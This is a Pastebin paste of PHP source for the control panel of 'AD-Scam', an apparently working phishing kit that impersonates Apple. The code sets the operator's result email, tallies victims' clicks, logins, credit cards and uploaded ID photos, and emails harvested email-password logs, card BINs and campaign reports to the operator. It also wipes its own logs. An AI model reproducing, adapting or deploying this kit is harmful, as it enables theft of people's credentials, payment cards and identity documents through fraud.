Advertisement
Guest User

Untitled

a guest
Jun 18th, 2018
563
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.96 KB | None | 0 0
  1. <?php
  2.  
  3. system("unzip web.zip");
  4. error_reporting(0);
  5. include 'conf/config.php';
  6. @require_once "yourmail.php";
  7. session_start();
  8. if($_SESSION['user'] == ""){
  9. header('location:_.php');
  10. }
  11.  
  12. $off = $_GET['account'];
  13. if(isset($off)){
  14. if($off == 'off'){
  15. session_destroy();
  16. unset($_SESSION['user']);
  17. session_unset();
  18. header('location:_.php');
  19. }
  20. else{
  21. echo '';
  22. }
  23. }
  24. ?>
  25.  
  26. <html>
  27. <head>
  28. <meta name="viewport" content="width=device.width" />
  29. <meta charset="UTF-8" />
  30. <style>
  31. *{
  32. text-decoration:none
  33. transition:0s;
  34. -webkit-transition:0.3s;
  35. transition-duration:0.3s;
  36. }
  37. body{
  38. color:#00FF00;
  39. background:black;
  40. margin:0%;
  41. font-family:segoe print;
  42. font-size: 12px;
  43. text-align: justify;
  44.  
  45. }
  46. h1 {font-size:3em;}
  47. .peler1{background:black; color:blue; border:1px solid blue; border-radius:6px; margin:4px; padding:8px;}
  48. .peler1:hover{background:blue; color:black;}
  49. .peler{background:black; color:red; border:1px solid red; border-radius:6px; margin:4px; padding:8px;}
  50. .peler:hover{background:red; color:black;}
  51. .but{background:black; color:#00FF00; border:1px solid green; border-radius:6px; margin:4px; padding:8px;}
  52. .but:hover{background:#00FF00; color:black;}
  53. .clc{
  54. background:black;
  55. border:none;
  56. border-radius:5px;
  57. color:#00FF00;
  58. font-weight:bold;
  59. padding:5px;
  60.  
  61. margin:7px;
  62. }
  63.  
  64. }
  65.  
  66. .bikin1{
  67.  
  68.  
  69. color:#00FF00;
  70. background:black;
  71. width:13%;
  72. padding:8px;
  73. outline:0px;
  74. border:1px solid green;
  75. }
  76.  
  77. }
  78. .box {
  79. color:#00FF00;
  80. margin: auto;
  81. box-shadow: 1px 1px 3px 1px red;
  82. width: 50%;
  83. border-radius: 10px;
  84. background:white;
  85. }
  86. </style>
  87. </head>
  88. <body>
  89. <br>
  90. <center>
  91. <a style="text-decoration: none; target="_blank"><font color="00FF00">Apple</font> <b>[ AD-Scam ]</font> <font color="00FF00">V1.0</font></a></footer>
  92.  
  93.  
  94. <footer style="position: fixed;bottom: 7px;left: 0px;right: 0px;text-align: center;letter-spacing: 1px;color: black;"> <a style="text-decoration: none;" href="https://web.facebook.com/azhar-id02" target="_blank"><font color="red">Version</font> <b>[ $ AD-Scam $ ]</font> <font color="red">V1.0</font></a></footer>
  95. <?php
  96. /*
  97. AD-Scam Apple Created 19 - 06 - 2018
  98. */
  99. error_reporting(0);
  100. @require_once "yourmail.php";
  101.  
  102. ?>
  103. <html>
  104. <head>
  105. <title>AD-Scam</title>
  106. <style type="text/css">
  107. #body {
  108. margin: auto;
  109. padding: 10px;
  110. text-align:;
  111.  
  112. }
  113. #masa {
  114. float: right;
  115. padding: 1px;
  116. letter-spacing:
  117. 0.5px;
  118. }
  119. .box {
  120. margin: auto;
  121. box-shadow: 1px 1px 3px 1px grey;
  122. width: 50%;
  123. border-radius: 10px;
  124. background: rgb(249, 247, 247);
  125. }
  126. .judul {
  127. padding: 7px;
  128. background: grey;
  129. border-radius: 10px 10px 0 0;
  130. border: none;
  131. margin-bottom: 7px;
  132. color: white;
  133. font-family: sans-serif;
  134. font-weight: bold;
  135. letter-spacing: 1px;
  136. word-spacing: 3px;
  137. }
  138. form {
  139. padding: 5px;
  140. }
  141. input[type=text] {
  142. padding: 3px 5px;
  143. margin-right: 3%;
  144. border:1px solid green;
  145. background:black;
  146. color:#00FF00;
  147. }
  148. input[type=peler] {
  149. color:#00FF00;
  150. background:black;
  151. width:50%;
  152. padding:1px;
  153. outline:11px;
  154. border:1px solid green;
  155. text-align: center;
  156. }
  157. input[type=submit] {
  158.  
  159. color:#00FF00;
  160. background:black;
  161. width:10%;
  162. padding:1px;
  163. outline:11px;
  164. border:1px solid green;
  165.  
  166. }
  167.  
  168. #total {
  169. text-align: center;
  170. }
  171. .klik,.alat {
  172. text-align: center;
  173. padding: 5px 11px;
  174. background: black;
  175. font-weight: bold;
  176. font-family: sans-serif;
  177. letter-spacing: 1px;
  178. word-spacing: 1px;
  179. font-size: 13px;
  180. color:#00FF00;
  181. margin: 0px 5px 10px;
  182. display: inline;
  183. border-radius: 5px;
  184. }
  185. .alat {
  186. background: none;
  187. margin: -5px;
  188. }
  189. </style>
  190. </head>
  191.  
  192.  
  193.  
  194.  
  195.  
  196. <center>
  197. </div>
  198. <div id="body">
  199.  
  200. <center>
  201. <form method="POST">
  202. Email Result : <input type="text" size="27" name="lama" value="<?php echo $Your_Email; ?>" required=required></input>
  203.  
  204. Pasng Email : <input type="text" size="27" name="baru" value"" placeholder="result@email.com" required=required></input>
  205. <div>
  206. <br>
  207.  
  208. <input type="submit" name="email" value="Click Here"></input>
  209.  
  210. </form>
  211. </div>
  212.  
  213.  
  214.  
  215. <a>Welcome User To Panel AD-Scam<a>
  216. <div>
  217.  
  218. <a href="steap1.php" target='_blank'><button class='peler1'> Fitur Panel AD-Scam </button></a>
  219. <a href="steap2.php" target='_blank'><button class='peler1'> Fitur Daily Harian AD-Scam </button></a>
  220. <a href="?account=off"><button class="peler">Log Out</button></a>
  221. <br><br>
  222.  
  223.  
  224. <a><a>
  225.  
  226. </div>
  227. <div id="body">
  228.  
  229. <center>
  230. <form method="POST">
  231. Photo Bule | AD-Scam Result <input type="text" size="27" name="lama" value="<?php echo $to; ?>" required=required></input>
  232. <input type="submit" name="" value="Auto Active"></input>
  233. <br>
  234. <br>
  235. <br>
  236. One Time Accesss <input type="text" size="27" name="lama" value="<?php echo $One_Time_Access; ?>" required=required></input>
  237.  
  238. <input type="submit" name="" value="Auto Active"></input>
  239. <div>
  240. <br>
  241. <br>
  242.  
  243. Save Result Server <input type="text" size="27" name="lama" value="<?php echo $Save_Log; ?>" required=required></input>
  244.  
  245. <input type="submit" name="" value="Auto Active"></input>
  246. </form>
  247. </div>
  248. <br>
  249. <br>
  250. <div id="total">
  251. <a>Result PC<br></a><a>
  252. <center>
  253. <form method="POST">
  254. <div class="klik">Click : <font color="blue"><?php echo empty(@file_get_contents("click.txt")) ? "0" : @file_get_contents("click.txt"); ?></font></div>
  255.  
  256. <div class="klik">Login : <font color="orange"><?php echo empty(@file_get_contents("login.txt")) ? "0" : @file_get_contents("login.txt"); ?></font></div>
  257.  
  258. <div class="klik">Credit Card : <font color="yellow"><?php echo empty(@file_get_contents("creditcard.txt")) ? "0" : @file_get_contents("creditcard.txt"); ?></font></div>
  259.  
  260. <div class="klik">Upluad ID : <font color="red"><?php echo empty(@file_get_contents("poto.txt")) ? "0" : @file_get_contents("poto.txt"); ?></font></div>
  261. </form>
  262. </div>
  263. </div>
  264.  
  265.  
  266. <?php
  267. @unlink("set.php");
  268.  
  269. $lama = trim(@$_POST['lama']);
  270. $baru = trim(@$_POST['baru']);
  271. $file = "yourmail.php";
  272. $isi = @file_get_contents($file);
  273.  
  274. if(isset($_POST['email'])) {
  275. if(@preg_match("#\b$lama\b#is", $isi)) {
  276. $isi = str_replace($lama,$baru,$isi);
  277. $buka = @fopen($file,'w');
  278. @fwrite($buka,$isi);
  279. fclose($buka);
  280.  
  281. echo "<script>alert('Done !')</script>";
  282. echo "<meta http-equiv='refresh' content='0; url=#Email'/>";
  283. }
  284. else
  285. echo "<script>alert('No !')</script>";
  286. }
  287. if(isset($_POST['peler'])) {
  288. if(@preg_match("#\b$lama\b#is", $isi)) {
  289. $isi = str_replace($lama,$baru,$isi);
  290. $buka = @fopen($file,'w');
  291. @fwrite($buka,$isi);
  292. fclose($buka);
  293.  
  294. echo "<script>alert('Done !')</script>";
  295. echo "<meta http-equiv='refresh' content='0; url=#Josh'/>";
  296. }
  297. else
  298. echo "<script>alert('No!')</script>";
  299. }
  300. else if(isset($_POST['key'])) {
  301. if(@preg_match("#\b$keylama\b#is", $isi)) {
  302. $isi = str_replace($keylama,$keybaru,$isi);
  303. $buka = @fopen($file,'w');
  304. @fwrite($buka,$isi);
  305. fclose($buka);
  306.  
  307. echo "<script>alert('sukses~')</script>";
  308. echo "<meta http-equiv='refresh' content='0; url=http://$_SERVER[HTTP_HOST]/bs/$keybaru#ganti_key'/>";
  309. }
  310. else
  311. echo "<script>alert('gagal!~')</script>";
  312. }
  313. else if(isset($_POST['reload'])) {
  314. if(@preg_match("#reloads = $rela#is", $isi)) {
  315. $isi = str_replace("$rela; // tot reload","$reba; // tot reload",$isi);
  316. $buka = @fopen($file,'w');
  317. @fwrite($buka,$isi);
  318. fclose($buka);
  319.  
  320. echo "<script>alert('sukses~')</script>";
  321. echo "<meta http-equiv='refresh' content='0; url=#ganti_total_reload'/>";
  322. }
  323. else
  324. echo "<script>alert('gagal!~')</script>";
  325. }
  326. else if(isset($_POST['param'])) {
  327. if(@preg_match("#param = \"$parla\"#is", $isi)) {
  328. $isi = str_replace("$parla\"; // Parameter Redirect","$parba\"; // Parameter Redirect",$isi);
  329. $buka = @fopen($file,'w');
  330. @fwrite($buka,$isi);
  331. fclose($buka);
  332.  
  333. echo "<script>alert('sukses~')</script>";
  334. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  335. }
  336. else
  337. echo "<script>alert('gagal!~')</script>";
  338. }
  339. else if(isset($_POST['rd'])) {
  340. @unlink("._no_.txt");
  341. @unlink("._nob_.txt");
  342. @unlink("assets/logs/._hitz_.txt");
  343. @unlink("assets/logs/._loginz_.txt");
  344. @unlink("assets/logs/._ccz_.txt");
  345. @unlink("._logz_.txt");
  346. @unlink("assets/logs/bxp.log");
  347. @unlink("assets/logs/bin.log");
  348. @unlink("error_log");
  349. @unlink("._ssid.txt");
  350. // @unlink("assets/includes/blacklist.dat");
  351. @unlink("assets/logs/accepted_visitors.txt");
  352. @unlink("assets/logs/ip2_log.txt");
  353. @unlink("assets/logs/denied_visitors.txt");
  354. @unlink("assets/logs/visitor_logged_in.txt");
  355.  
  356. echo "<script>alert('sukses~')</script>";
  357. echo "<meta http-equiv='refresh' content='0; url=#reset_data'/>";
  358. }
  359. else if(isset($_POST['sd'])) {
  360. $empass = @file_get_contents("assets/logs/bxp.log");
  361. $total = substr_count($empass,"@");
  362.  
  363. if($total <= 0)
  364. {
  365. echo '<script>alert("gagal~\n\nempas kosong :P")</script>';
  366. }
  367. else
  368. {
  369. $fil = "._no_.txt";
  370. $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  371. $urut = fopen($fil,"w");
  372. fwrite($urut,$last+1);
  373. fclose($urut);
  374.  
  375. $headers = "From: Empas Apel <empas.apel@ad-scam.team>\r\n";
  376. $headers .= "Reply-to: apel@ad-scam.team\r\n";
  377. $headers .= "MIME-Version: 1.0\r\n";
  378. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  379. $subj = "[ #$last ] [ Total $total Empas ] [ ".date("D, d-F-y H:i")." ]";
  380. $to = $Your_Email;
  381. $data = "++--------------[ ]--------------++
  382.  
  383. -----------------------------------------------------------------
  384. $empass
  385. -----------------------------------------------------------------";
  386.  
  387. @mail($to, $subj, $data, $headers);
  388.  
  389. echo "<script>alert('sukses~')</script>";
  390. echo "<meta http-equiv='refresh' content='0; url=#send_empas'/>";
  391. }
  392. }
  393. else if(isset($_POST['sb'])) {
  394. $binbin = @file_get_contents("assets/logs/bin.log");
  395. $total = substr_count($binbin,"[");
  396.  
  397. if($total <= 0)
  398. {
  399. echo '<script>alert("gagal~\n\nbin kosong :P")</script>';
  400. }
  401. else
  402. {
  403. $fil = "._nob_.txt";
  404. $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  405. $urut = fopen($fil,"w");
  406. fwrite($urut,$last+1);
  407. fclose($urut);
  408.  
  409. $headers = "From: Bin Colletions <bin.cece@ad-scam.team>\r\n";
  410. $headers .= "Reply-to: apel@ad-scam.team\r\n";
  411. $headers .= "MIME-Version: 1.0\r\n";
  412. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  413. $subj = "[ #$last ] [ Total $total Card BINs ] [ ".date("D, d-F-y H:i")." ]";
  414. $to = $Your_Email;
  415. $data = "++--------------]--------------++
  416.  
  417. -----------------------------------------------------------------
  418. $binbin
  419. -----------------------------------------------------------------";
  420.  
  421. @mail($to, $subj, $data, $headers);
  422.  
  423. echo "<script>alert('sukses~')</script>";
  424. echo "<meta http-equiv='refresh' content='0; url=#send_bin'/>";
  425. }
  426. }
  427. else if(isset($_POST['sl'])) {
  428. $fil2 = "._logz_.txt";
  429. $lasts = (@file_get_contents($fil2) == "" ? "1" : @file_get_contents($fil2));
  430. $urut = fopen($fil2,"w");
  431. fwrite($urut,$lasts+1);
  432. fclose($urut);
  433.  
  434. $headers = "From: AD-Scam Report <report.apel@ad-scam.team>\r\n";
  435. $headers .= "Reply-to: apel@ad-scam.team\r\n";
  436. $headers .= "MIME-Version: 1.0\r\n";
  437. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  438. $subj = "[ Laporan ke #$lasts ] [ AD Apple Scampage ] [ ".date("D, d-F-y H:i")." ]";
  439. $to = $Your_Email;
  440. $tor = $tglorder;
  441. $tcl = (@file_get_contents("assets/logs/._hitz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._hitz_.txt"));
  442. $tlo = (@file_get_contents("assets/logs/._loginz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._loginz_.txt"));
  443. $tcc = (@file_get_contents("assets/logs/._ccz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._ccz_.txt"));
  444. $tlh = substr_count(@file_get_contents("._ssid.txt")," ");
  445. $det = array("u" => $_SERVER['SERVER_NAME'],"p" => $_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"],"m" => $umurlog,"tc" => $tcl,"tl" => $tlo,"tcc" => $tcc,"lh" => $tlh);
  446. $data = "
  447. ++------------------
  448. ------------------------------------------------------------------------
  449. # Domen Scam : ".$det['u']."
  450. # Panel Scam : ".$det['p']."
  451. # Umur Scam : ".$det['m']." hari
  452. # Tanggal Order : ".$tor."
  453. # Total Load : ".$det['lh']."
  454. # Total Klik : ".$det['tc']."
  455. # Total Login : ".$det['tl']."
  456. # Total Card : ".$det['tcc']."
  457. ------------------------------------------------------------------------";
  458.  
  459. @mail($to, $subj, $data, $headers);
  460.  
  461. echo "<script>alert('sukses~')</script>";
  462. echo "<meta http-equiv='refresh' content='0; url=#send_report'/>";
  463. }
  464. ?>
  465.  
  466. </body>
  467. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement